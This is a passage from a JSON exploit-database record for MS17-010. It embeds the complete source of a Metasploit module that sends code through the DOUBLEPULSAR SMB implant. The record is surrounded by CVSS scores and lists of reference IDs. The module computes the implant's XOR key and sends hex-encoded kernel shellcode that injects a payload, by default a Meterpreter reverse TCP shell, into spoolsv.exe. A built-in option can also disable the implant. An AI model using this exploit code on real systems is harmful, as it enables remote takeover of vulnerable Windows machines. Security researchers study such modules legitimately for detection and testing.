"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-16T22:32:51", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-16T22:32:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-20] #"}, "lastseen": "2021-09-20T20:22:59", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "436213826adc1a28e49a3aa4b64b27e1", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-09-21T00:18:31", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": 
"packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-21T00:18:31", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-21T00:18:31", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
